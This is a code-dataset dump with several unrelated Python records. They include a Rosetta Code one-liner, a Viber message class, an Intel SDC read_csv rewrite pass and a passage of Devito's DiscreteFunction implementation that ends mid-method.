absltest.main()
|
en
| 0.863941
|
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Tests for iterated_prisoners_dilemma.py. # pylint: disable=unused-import Check the game can be converted to a turn-based game. Check the game can be created as a turn-based game from a string. Runs our standard game tests, checking API consistency.
| 2.543876
| 3
|
Task/Shell-one-liner/Python/shell-one-liner-2.py
|
LaudateCorpus1/RosettaCodeData
| 1
|
6627580
|
python -m CGIHTTPServer
|
python -m CGIHTTPServer
|
none
| 1
| 1.087753
| 1
|
|
viberio/types/messages/message.py
|
bostud/Viber_bot
| 0
|
6627581
|
import attr
from viberio.types.base import ViberBaseObject
@attr.s
class Message(ViberBaseObject):
tracking_data: str = attr.ib(default=None)
keyboard: str = attr.ib(default=None)
min_api_version: str = attr.ib(default=None)
alt_text: str = attr.ib(default=None)
@attr.s
class TypedMessage(Message):
def __init__(self):
self.text = None
type: str = attr.ib(default=None)
|
import attr
from viberio.types.base import ViberBaseObject
@attr.s
class Message(ViberBaseObject):
tracking_data: str = attr.ib(default=None)
keyboard: str = attr.ib(default=None)
min_api_version: str = attr.ib(default=None)
alt_text: str = attr.ib(default=None)
@attr.s
class TypedMessage(Message):
def __init__(self):
self.text = None
type: str = attr.ib(default=None)
|
none
| 1
| 2.361694
| 2
|
|
sdc/rewrites/read_csv_consts.py
|
Vyacheslav-Smirnov/hpat
| 0
|
6627582
|
# *****************************************************************************
# Copyright (c) 2020, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# *****************************************************************************
from numba.core.rewrites import register_rewrite, Rewrite
from numba.core.ir_utils import find_callname, guard, mk_unique_var
from numba import errors
from numba.core import ir
from numba.core import consts
from sdc.rewrites.ir_utils import remove_unused_recursively, make_assign, find_operations
def find_build_sequence(func_ir, var):
"""Reimplemented from numba.core.ir_utils.find_build_sequence
Added 'build_map' to build_ops list.
"""
from numba.core.ir_utils import (require, get_definition)
require(isinstance(var, ir.Var))
var_def = get_definition(func_ir, var)
require(isinstance(var_def, ir.Expr))
build_ops = ['build_tuple', 'build_list', 'build_set', 'build_map']
require(var_def.op in build_ops)
return var_def.items, var_def.op
class ConstantInference(consts.ConstantInference):
def _infer_expr(self, expr):
if expr.op == 'build_map':
def inf_const(value):
return self.infer_constant(value.name, loc=expr.loc)
return {inf_const(k): inf_const(v) for k, v in expr.items}
return super()._infer_expr(expr)
@register_rewrite('before-inference')
class RewriteReadCsv(Rewrite):
"""
Searches for calls of pandas.read_csv() and replace it with calls of read_csv.
"""
_pandas_read_csv_calls = [
('read_csv', 'pandas'), # for calls like pandas.read_csv()
('read_csv', 'pandas.io.parsers'), # for calls like read_csv = pandas.read_csv, read_csv()
]
_read_csv_const_args = ('names', 'dtype', 'usecols')
def match(self, func_ir, block, typemap, calltypes):
# TODO: 1. save instructions of build_map, build_list for read_csv params
# 2. check that vars are used only in read_csv
# 3. replace vars with build_tuple inplace
self.func_ir = func_ir
self.block = block
self.consts = consts = {}
# Find all assignments with a right-hand read_csv() call
for inst in find_operations(block=block, op_name='call'):
expr = inst.value
call = guard(find_callname, func_ir, expr)
if call not in self._pandas_read_csv_calls:
continue
# collect constant parameters with type list and dict
# in order to replace with tuple
for key, var in expr.kws:
if key not in self._read_csv_const_args:
continue
try:
const = func_ir.infer_constant(var)
except errors.ConstantInferenceError:
try:
const = ConstantInference(func_ir).infer_constant(var.name)
except errors.ConstantInferenceError:
continue
if isinstance(const, (list, dict)):
consts.setdefault(inst, {})[key] = const
return len(consts) > 0
def apply(self):
new_block = self.block.copy()
new_block.clear()
vars_to_remove = []
for inst in self.block.body:
if inst in self.consts:
consts = self.consts[inst]
for key, value in consts.items():
if key not in dict(inst.value.kws):
continue
# collecting data from current variable
current_var = [var for name, var in inst.value.kws if name == key][0]
loc = current_var.loc
seq, _ = guard(find_build_sequence, self.func_ir, current_var)
if not seq:
continue
if isinstance(value, list):
items = seq
elif isinstance(value, dict):
items = sum(map(list, seq), [])
else:
continue
# create tuple variable
stmt = make_assign(ir.Expr.build_tuple(items=items, loc=loc), new_block.scope,
self.func_ir, loc, name=f"{key}_tuple")
new_block.append(stmt)
# replace variable in call
inst.value.kws = [(kw[0], stmt.target) if kw[0] == key else kw for kw in inst.value.kws]
# save old variable for removing
vars_to_remove.append(current_var)
new_block.append(inst)
# remove old variables
for var in vars_to_remove:
# unsused variables are removed after new block is created b/c
# remove_unused_recursively should see all del statements of variables
remove_unused_recursively(var, new_block, self.func_ir)
return new_block
|
# *****************************************************************************
# Copyright (c) 2020, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# *****************************************************************************
from numba.core.rewrites import register_rewrite, Rewrite
from numba.core.ir_utils import find_callname, guard, mk_unique_var
from numba import errors
from numba.core import ir
from numba.core import consts
from sdc.rewrites.ir_utils import remove_unused_recursively, make_assign, find_operations
def find_build_sequence(func_ir, var):
"""Reimplemented from numba.core.ir_utils.find_build_sequence
Added 'build_map' to build_ops list.
"""
from numba.core.ir_utils import (require, get_definition)
require(isinstance(var, ir.Var))
var_def = get_definition(func_ir, var)
require(isinstance(var_def, ir.Expr))
build_ops = ['build_tuple', 'build_list', 'build_set', 'build_map']
require(var_def.op in build_ops)
return var_def.items, var_def.op
class ConstantInference(consts.ConstantInference):
def _infer_expr(self, expr):
if expr.op == 'build_map':
def inf_const(value):
return self.infer_constant(value.name, loc=expr.loc)
return {inf_const(k): inf_const(v) for k, v in expr.items}
return super()._infer_expr(expr)
@register_rewrite('before-inference')
class RewriteReadCsv(Rewrite):
"""
Searches for calls of pandas.read_csv() and replace it with calls of read_csv.
"""
_pandas_read_csv_calls = [
('read_csv', 'pandas'), # for calls like pandas.read_csv()
('read_csv', 'pandas.io.parsers'), # for calls like read_csv = pandas.read_csv, read_csv()
]
_read_csv_const_args = ('names', 'dtype', 'usecols')
def match(self, func_ir, block, typemap, calltypes):
# TODO: 1. save instructions of build_map, build_list for read_csv params
# 2. check that vars are used only in read_csv
# 3. replace vars with build_tuple inplace
self.func_ir = func_ir
self.block = block
self.consts = consts = {}
# Find all assignments with a right-hand read_csv() call
for inst in find_operations(block=block, op_name='call'):
expr = inst.value
call = guard(find_callname, func_ir, expr)
if call not in self._pandas_read_csv_calls:
continue
# collect constant parameters with type list and dict
# in order to replace with tuple
for key, var in expr.kws:
if key not in self._read_csv_const_args:
continue
try:
const = func_ir.infer_constant(var)
except errors.ConstantInferenceError:
try:
const = ConstantInference(func_ir).infer_constant(var.name)
except errors.ConstantInferenceError:
continue
if isinstance(const, (list, dict)):
consts.setdefault(inst, {})[key] = const
return len(consts) > 0
def apply(self):
new_block = self.block.copy()
new_block.clear()
vars_to_remove = []
for inst in self.block.body:
if inst in self.consts:
consts = self.consts[inst]
for key, value in consts.items():
if key not in dict(inst.value.kws):
continue
# collecting data from current variable
current_var = [var for name, var in inst.value.kws if name == key][0]
loc = current_var.loc
seq, _ = guard(find_build_sequence, self.func_ir, current_var)
if not seq:
continue
if isinstance(value, list):
items = seq
elif isinstance(value, dict):
items = sum(map(list, seq), [])
else:
continue
# create tuple variable
stmt = make_assign(ir.Expr.build_tuple(items=items, loc=loc), new_block.scope,
self.func_ir, loc, name=f"{key}_tuple")
new_block.append(stmt)
# replace variable in call
inst.value.kws = [(kw[0], stmt.target) if kw[0] == key else kw for kw in inst.value.kws]
# save old variable for removing
vars_to_remove.append(current_var)
new_block.append(inst)
# remove old variables
for var in vars_to_remove:
# unsused variables are removed after new block is created b/c
# remove_unused_recursively should see all del statements of variables
remove_unused_recursively(var, new_block, self.func_ir)
return new_block
|
en
| 0.672164
|
# ***************************************************************************** # Copyright (c) 2020, Intel Corporation All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ***************************************************************************** Reimplemented from numba.core.ir_utils.find_build_sequence Added 'build_map' to build_ops list. Searches for calls of pandas.read_csv() and replace it with calls of read_csv. # for calls like pandas.read_csv() # for calls like read_csv = pandas.read_csv, read_csv() # TODO: 1. save instructions of build_map, build_list for read_csv params # 2. check that vars are used only in read_csv # 3. replace vars with build_tuple inplace # Find all assignments with a right-hand read_csv() call # collect constant parameters with type list and dict # in order to replace with tuple # collecting data from current variable # create tuple variable # replace variable in call # save old variable for removing # remove old variables # unsused variables are removed after new block is created b/c # remove_unused_recursively should see all del statements of variables
| 1.314286
| 1
|
devito/types/dense.py
|
fffarias/devito-1
| 199
|
6627583
|
from collections import namedtuple
from ctypes import POINTER, Structure, c_void_p, c_int, cast, byref
from functools import wraps, reduce
from math import ceil
from operator import mul
import numpy as np
import sympy
from psutil import virtual_memory
from cached_property import cached_property
from cgen import Struct, Value
from devito.builtins import assign
from devito.data import (DOMAIN, OWNED, HALO, NOPAD, FULL, LEFT, CENTER, RIGHT,
Data, default_allocator)
from devito.exceptions import InvalidArgument
from devito.logger import debug, warning
from devito.mpi import MPI
from devito.parameters import configuration
from devito.symbolics import FieldFromPointer
from devito.finite_differences import Differentiable, generate_fd_shortcuts
from devito.tools import (ReducerMap, as_tuple, flatten, is_integer,
ctypes_to_cstr, memoized_meth, dtype_to_ctype)
from devito.types.dimension import Dimension
from devito.types.args import ArgProvider
from devito.types.caching import CacheManager
from devito.types.basic import AbstractFunction, Size
from devito.types.utils import Buffer, DimensionTuple, NODE, CELL
__all__ = ['Function', 'TimeFunction', 'SubFunction', 'TempFunction']
RegionMeta = namedtuple('RegionMeta', 'offset size')
class DiscreteFunction(AbstractFunction, ArgProvider, Differentiable):
"""
Tensor symbol representing a discrete function in symbolic equations.
Unlike an Array, a DiscreteFunction carries data.
Notes
-----
Users should not instantiate this class directly. Use Function or
SparseFunction (or their subclasses) instead.
"""
# Required by SymPy, otherwise the presence of __getitem__ will make SymPy
# think that a DiscreteFunction is actually iterable, thus breaking many of
# its key routines (e.g., solve)
_iterable = False
is_Input = True
is_DiscreteFunction = True
_DataType = Data
"""
The type of the underlying data object.
"""
def __init_finalize__(self, *args, **kwargs):
# A `Distributor` to handle domain decomposition (only relevant for MPI)
self._distributor = self.__distributor_setup__(**kwargs)
# Staggering metadata
self._staggered = self.__staggered_setup__(**kwargs)
# Now that *all* __X_setup__ hooks have been called, we can let the
# superclass constructor do its job
super(DiscreteFunction, self).__init_finalize__(*args, **kwargs)
# There may or may not be a `Grid` attached to the DiscreteFunction
self._grid = kwargs.get('grid')
# Symbolic (finite difference) coefficients
self._coefficients = kwargs.get('coefficients', 'standard')
if self._coefficients not in ('standard', 'symbolic'):
raise ValueError("coefficients must be `standard` or `symbolic`")
# Data-related properties and data initialization
self._data = None
self._first_touch = kwargs.get('first_touch', configuration['first-touch'])
self._allocator = kwargs.get('allocator') or default_allocator()
initializer = kwargs.get('initializer')
if initializer is None or callable(initializer):
# Initialization postponed until the first access to .data
self._initializer = initializer
elif isinstance(initializer, (np.ndarray, list, tuple)):
# Allocate memory and initialize it. Note that we do *not* hold
# a reference to the user-provided buffer
self._initializer = None
if len(initializer) > 0:
self.data_with_halo[:] = initializer
else:
# This is a corner case -- we might get here, for example, when
# running with MPI and some processes get 0-size arrays after
# domain decomposition. We touch the data anyway to avoid the
# case ``self._data is None``
self.data
else:
raise ValueError("`initializer` must be callable or buffer, not %s"
% type(initializer))
def __eq__(self, other):
# The only possibility for two DiscreteFunctions to be considered equal
# is that they are indeed the same exact object
return self is other
def __hash__(self):
return id(self)
_subs = Differentiable._subs
def _allocate_memory(func):
"""Allocate memory as a Data."""
@wraps(func)
def wrapper(self):
if self._data is None:
debug("Allocating memory for %s%s" % (self.name, self.shape_allocated))
# Clear up both SymPy and Devito caches to drop unreachable data
CacheManager.clear(force=False)
# Allocate the actual data object
self._data = self._DataType(self.shape_allocated, self.dtype,
modulo=self._mask_modulo,
allocator=self._allocator,
distributor=self._distributor)
# Initialize data
if self._first_touch:
assign(self, 0)
if callable(self._initializer):
if self._first_touch:
warning("`first touch` together with `initializer` causing "
"redundant data initialization")
try:
self._initializer(self.data_with_halo)
except ValueError:
# Perhaps user only wants to initialise the physical domain
self._initializer(self.data)
else:
self.data_with_halo.fill(0)
return func(self)
return wrapper
@classmethod
def __dtype_setup__(cls, **kwargs):
grid = kwargs.get('grid')
dtype = kwargs.get('dtype')
if dtype is not None:
return dtype
elif grid is not None:
return grid.dtype
else:
return np.float32
def __staggered_setup__(self, **kwargs):
"""
Setup staggering-related metadata. This method assigns:
* 0 to non-staggered dimensions;
* 1 to staggered dimensions.
"""
staggered = kwargs.get('staggered', None)
if staggered is CELL:
staggered = self.dimensions
return staggered
def __distributor_setup__(self, **kwargs):
grid = kwargs.get('grid')
# There may or may not be a `Distributor`. In the latter case, the
# DiscreteFunction is to be considered "local" to each MPI rank
return kwargs.get('distributor') if grid is None else grid.distributor
@cached_property
def _functions(self):
return {self.function}
@property
def _data_buffer(self):
"""
Reference to the data. Unlike :attr:`data` and :attr:`data_with_halo`,
this *never* returns a view of the data. This method is for internal use only.
"""
return self._data_allocated
@property
def _data_alignment(self):
return self._allocator.guaranteed_alignment
@property
def _mem_external(self):
return True
@property
def grid(self):
"""The Grid on which the discretization occurred."""
return self._grid
@property
def staggered(self):
return self._staggered
@property
def coefficients(self):
"""Form of the coefficients of the function."""
return self._coefficients
@cached_property
def _coeff_symbol(self):
if self.coefficients == 'symbolic':
return sympy.Function('W')
else:
raise ValueError("Function was not declared with symbolic "
"coefficients.")
@cached_property
def shape(self):
"""
Shape of the domain region. The domain constitutes the area of the
data written to by an Operator.
Notes
-----
In an MPI context, this is the *local* domain region shape.
"""
return self._shape
@cached_property
def shape_domain(self):
"""
Shape of the domain region. The domain constitutes the area of the
data written to by an Operator.
Notes
-----
In an MPI context, this is the *local* domain region shape.
Alias to ``self.shape``.
"""
return self.shape
@cached_property
def shape_with_halo(self):
"""
Shape of the domain+outhalo region. The outhalo is the region
surrounding the domain that may be read by an Operator.
Notes
-----
In an MPI context, this is the *local* with_halo region shape.
Further, note that the outhalo of inner ranks is typically empty, while
the outhalo of boundary ranks contains a number of elements depending
on the rank position in the decomposed grid (corner, side, ...).
"""
return tuple(j + i + k for i, (j, k) in zip(self.shape, self._size_outhalo))
_shape_with_outhalo = shape_with_halo
@cached_property
def _shape_with_inhalo(self):
"""
Shape of the domain+inhalo region. The inhalo region comprises the
outhalo as well as any additional "ghost" layers for MPI halo
exchanges. Data in the inhalo region are exchanged when running
Operators to maintain consistent values as in sequential runs.
Notes
-----
Typically, this property won't be used in user code, but it may come
in handy for testing or debugging
"""
return tuple(j + i + k for i, (j, k) in zip(self.shape, self._halo))
@cached_property
def shape_allocated(self):
"""
Shape of the allocated data. It includes the domain and inhalo regions,
as well as any additional padding surrounding the halo.
Notes
-----
In an MPI context, this is the *local* with_halo region shape.
"""
return DimensionTuple(*[j + i + k for i, (j, k) in zip(self._shape_with_inhalo,
self._padding)],
getters=self.dimensions)
@cached_property
def shape_global(self):
"""
Global shape of the domain region. The domain constitutes the area of
the data written to by an Operator.
Notes
-----
In an MPI context, this is the *global* domain region shape, which is
therefore identical on all MPI ranks.
"""
if self.grid is None:
return self.shape
retval = []
for d, s in zip(self.dimensions, self.shape):
size = self.grid.dimension_map.get(d)
retval.append(size.glb if size is not None else s)
return tuple(retval)
@property
def size_global(self):
"""
The global number of elements this object is expected to store in memory.
Note that this would need to be combined with self.dtype to give the actual
size in bytes.
"""
return reduce(mul, self.shape_global)
_offset_inhalo = AbstractFunction._offset_halo
_size_inhalo = AbstractFunction._size_halo
@cached_property
def _size_outhalo(self):
"""Number of points in the outer halo region."""
if self._distributor is None:
# Computational domain is not distributed and hence the outhalo
# and inhalo correspond
return self._size_inhalo
left = [abs(min(i.loc_abs_min-i.glb_min-j, 0)) if i and not i.loc_empty else 0
for i, j in zip(self._decomposition, self._size_inhalo.left)]
right = [max(i.loc_abs_max+j-i.glb_max, 0) if i and not i.loc_empty else 0
for i, j in zip(self._decomposition, self._size_inhalo.right)]
sizes = tuple(Size(i, j) for i, j in zip(left, right))
if self._distributor.is_parallel and (any(left) > 0 or any(right)) > 0:
try:
warning_msg = """A space order of {0} and a halo size of {1} has been
set but the current rank ({2}) has a domain size of
only {3}""".format(self._space_order,
max(self._size_inhalo),
self._distributor.myrank,
min(self.grid.shape_local))
if not self._distributor.is_boundary_rank:
warning(warning_msg)
else:
left_dist = [i for i, d in zip(left, self.dimensions) if d
in self._distributor.dimensions]
right_dist = [i for i, d in zip(right, self.dimensions) if d
in self._distributor.dimensions]
for i, j, k, l in zip(left_dist, right_dist,
self._distributor.mycoords,
self._distributor.topology):
if l > 1 and ((j > 0 and k == 0) or (i > 0 and k == l-1)):
warning(warning_msg)
break
except AttributeError:
pass
return DimensionTuple(*sizes, getters=self.dimensions, left=left, right=right)
@property
def size_allocated(self):
"""
The number of elements this object is expected to store in memory.
Note that this would need to be combined with self.dtype to give the actual
size in bytes.
"""
return reduce(mul, self.shape_allocated)
@cached_property
def _mask_modulo(self):
"""Boolean mask telling which Dimensions support modulo-indexing."""
return tuple(True if i.is_Stepping else False for i in self.dimensions)
@cached_property
def _mask_domain(self):
"""Slice-based mask to access the domain region of the allocated data."""
return tuple(slice(i, j) for i, j in
zip(self._offset_domain, self._offset_halo.right))
@cached_property
def _mask_inhalo(self):
"""Slice-based mask to access the domain+inhalo region of the allocated data."""
return tuple(slice(i.left, i.right + j.right) for i, j in
zip(self._offset_inhalo, self._size_inhalo))
@cached_property
def _mask_outhalo(self):
"""Slice-based mask to access the domain+outhalo region of the allocated data."""
return tuple(slice(i.start - j.left, i.stop and i.stop + j.right or None)
for i, j in zip(self._mask_domain, self._size_outhalo))
@cached_property
def _decomposition(self):
"""
Tuple of Decomposition objects, representing the domain decomposition.
None is used as a placeholder for non-decomposed Dimensions.
"""
if self._distributor is None:
return (None,)*self.ndim
mapper = {d: self._distributor.decomposition[d] for d in self._dist_dimensions}
return tuple(mapper.get(d) for d in self.dimensions)
@cached_property
def _decomposition_outhalo(self):
"""
Tuple of Decomposition objects, representing the domain+outhalo
decomposition. None is used as a placeholder for non-decomposed Dimensions.
"""
if self._distributor is None:
return (None,)*self.ndim
return tuple(v.reshape(*self._size_inhalo[d]) if v is not None else v
for d, v in zip(self.dimensions, self._decomposition))
@property
def data(self):
"""
The domain data values, as a numpy.ndarray.
Elements are stored in row-major format.
Notes
-----
With this accessor you are claiming that you will modify the values you
get back. If you only need to look at the values, use :meth:`data_ro`
instead.
"""
return self.data_domain
def data_gather(self, start=None, stop=None, step=1, rank=0):
"""
Gather distributed `Data` attached to a `Function` onto a single rank.
Parameters
----------
rank : int
The rank onto which the data will be gathered.
step : int or tuple of ints
The `slice` step in each dimension.
start : int or tuple of ints
The `slice` start in each dimension.
stop : int or tuple of ints
The final point of the `slice` to include.
Notes
-----
Alias to ``self.data._gather``.
Note that gathering data from large simulations onto a single rank may
result in memory blow-up and hence should use this method judiciously.
"""
return self.data._gather(start=start, stop=stop, step=step, rank=rank)
@property
@_allocate_memory
def data_domain(self):
"""
The domain data values.
Elements are stored in row-major format.
Notes
-----
Alias to ``self.data``.
With this accessor you are claiming that you will modify the values you
get back. If you only need to look at the values, use
:meth:`data_ro_domain` instead.
"""
self._is_halo_dirty = True
return self._data._global(self._mask_domain, self._decomposition)
@property
@_allocate_memory
def data_with_halo(self):
"""
The domain+outhalo data values.
Elements are stored in row-major format.
Notes
-----
With this accessor you are claiming that you will modify the values you
get back. If you only need to look at the values, use
:meth:`data_ro_with_halo` instead.
"""
self._is_halo_dirty = True
self._halo_exchange()
return self._data._global(self._mask_outhalo, self._decomposition_outhalo)
_data_with_outhalo = data_with_halo
@property
@_allocate_memory
def _data_with_inhalo(self):
"""
The domain+inhalo data values.
Elements are stored in row-major format.
Notes
-----
This accessor does *not* support global indexing.
With this accessor you are claiming that you will modify the values you
get back. If you only need to look at the values, use
:meth:`data_ro_with_inhalo` instead.
Typically, this accessor won't be used in user code to set or read data
values. Instead, it may come in handy for testing or debugging
"""
self._is_halo_dirty = True
self._halo_exchange()
return np.asarray(self._data[self._mask_inhalo])
@property
@_allocate_memory
def _data_allocated(self):
"""
The allocated data values, that is domain+inhalo+padding.
Elements are stored in row-major format.
Notes
-----
This accessor does *not* support global indexing.
With this accessor you are claiming that you will modify the values you
get back. If you only need to look at the values, use
:meth:`data_ro_allocated` instead.
Typically, this accessor won't be used in user code to set or read data
values. Instead, it may come in handy for testing or debugging
"""
self._is_halo_dirty = True
self._halo_exchange()
return np.asarray(self._data)
def _data_in_region(self, region, dim, side):
"""
The data values in a given region.
Parameters
----------
region : DataRegion
The data region of interest (e.g., OWNED, HALO) for which a view
is produced.
dim : Dimension
The dimension of interest.
side : DataSide
The side of interest (LEFT, RIGHT).
Notes
-----
This accessor does *not* support global indexing.
With this accessor you are claiming that you will modify the values you
get back.
Typically, this accessor won't be used in user code to set or read
data values.
"""
self._is_halo_dirty = True
offset = getattr(getattr(self, '_offset_%s' % region.name)[dim], side.name)
size = getattr(getattr(self, '_size_%s' % region.name)[dim], side.name)
index_array = [
slice(offset, offset+size) if d is dim else slice(pl, s - pr)
for d, s, (pl, pr)
in zip(self.dimensions, self.shape_allocated, self._padding)
]
return np.asarray(self._data[index_array])
@property
@_allocate_memory
def data_ro_domain(self):
"""Read-only view of the domain data values."""
view = self._data._global(self._mask_domain, self._decomposition)
view.setflags(write=False)
return view
@property
@_allocate_memory
def data_ro_with_halo(self):
"""Read-only view of the domain+outhalo data values."""
view = self._data._global(self._mask_outhalo, self._decomposition_outhalo)
view.setflags(write=False)
return view
_data_ro_with_outhalo = data_ro_with_halo
@property
@_allocate_memory
def _data_ro_with_inhalo(self):
"""
Read-only view of the domain+inhalo data values.
Notes
-----
This accessor does *not* support global indexing.
"""
view = self._data[self._mask_inhalo]
view.setflags(write=False)
return np.asarray(view)
@property
@_allocate_memory
def _data_ro_allocated(self):
"""
Read-only view of the domain+inhalo+padding data values.
Notes
-----
This accessor does *not* support global indexing.
"""
view = self._data
view.setflags(write=False)
return np.asarray(view)
@cached_property
def local_indices(self):
"""
Tuple of slices representing the global indices that logically
belong to the calling MPI rank.
Notes
-----
Given a Function ``f(x, y)`` with shape ``(nx, ny)``, when *not* using
MPI this property will return ``(slice(0, nx-1), slice(0, ny-1))``. On
the other hand, when MPI is used, the local ranges depend on the domain
decomposition, which is carried by ``self.grid``.
"""
if self._distributor is None:
return tuple(slice(0, s) for s in self.shape)
else:
return tuple(self._distributor.glb_slices.get(d, slice(0, s))
for s, d in zip(self.shape, self.dimensions))
@cached_property
def space_dimensions(self):
"""Tuple of Dimensions defining the physical space."""
return tuple(d for d in self.dimensions if d.is_Space)
@cached_property
def _dist_dimensions(self):
"""Tuple of MPI-distributed Dimensions."""
if self._distributor is None:
return ()
return tuple(d for d in self.dimensions if d in self._distributor.dimensions)
@property
def initializer(self):
if self._data is not None:
return self.data_with_halo.view(np.ndarray)
else:
return self._initializer
_C_structname = 'dataobj'
_C_typename = 'struct %s *' % _C_structname
_C_field_data = 'data'
_C_field_size = 'size'
_C_field_nopad_size = 'npsize'
_C_field_domain_size = 'dsize'
_C_field_halo_size = 'hsize'
_C_field_halo_ofs = 'hofs'
_C_field_owned_ofs = 'oofs'
_C_typedecl = Struct(_C_structname,
[Value('%srestrict' % ctypes_to_cstr(c_void_p), _C_field_data),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_size),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_nopad_size),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_domain_size),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_halo_size),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_halo_ofs),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_owned_ofs)])
_C_ctype = POINTER(type(_C_structname, (Structure,),
{'_fields_': [(_C_field_data, c_void_p),
(_C_field_size, POINTER(c_int)),
(_C_field_nopad_size, POINTER(c_int)),
(_C_field_domain_size, POINTER(c_int)),
(_C_field_halo_size, POINTER(c_int)),
(_C_field_halo_ofs, POINTER(c_int)),
(_C_field_owned_ofs, POINTER(c_int))]}))
def _C_make_dataobj(self, data):
"""
A ctypes object representing the DiscreteFunction that can be passed to
an Operator.
"""
dataobj = byref(self._C_ctype._type_())
dataobj._obj.data = data.ctypes.data_as(c_void_p)
dataobj._obj.size = (c_int*self.ndim)(*data.shape)
# MPI-related fields
dataobj._obj.npsize = (c_int*self.ndim)(*[i - sum(j) for i, j in
zip(data.shape, self._size_padding)])
dataobj._obj.dsize = (c_int*self.ndim)(*self._size_domain)
dataobj._obj.hsize = (c_int*(self.ndim*2))(*flatten(self._size_halo))
dataobj._obj.hofs = (c_int*(self.ndim*2))(*flatten(self._offset_halo))
dataobj._obj.oofs = (c_int*(self.ndim*2))(*flatten(self._offset_owned))
# stash a reference to the array on _obj, so we don't let it get freed
# while we hold onto _obj
dataobj._obj.underlying_array = data
return dataobj
def _C_as_ndarray(self, dataobj):
"""Cast the data carried by a DiscreteFunction dataobj to an ndarray."""
shape = tuple(dataobj._obj.size[i] for i in range(self.ndim))
ctype_1d = dtype_to_ctype(self.dtype) * int(reduce(mul, shape))
buf = cast(dataobj._obj.data, POINTER(ctype_1d)).contents
return np.frombuffer(buf, dtype=self.dtype).reshape(shape)
@memoized_meth
def _C_make_index(self, dim, side=None):
# Depends on how fields are populated in `_C_make_dataobj`
idx = self.dimensions.index(dim)
if side is not None:
idx = idx*2 + (0 if side is LEFT else 1)
return idx
@memoized_meth
def _C_get_field(self, region, dim, side=None):
"""Symbolic representation of a given data region."""
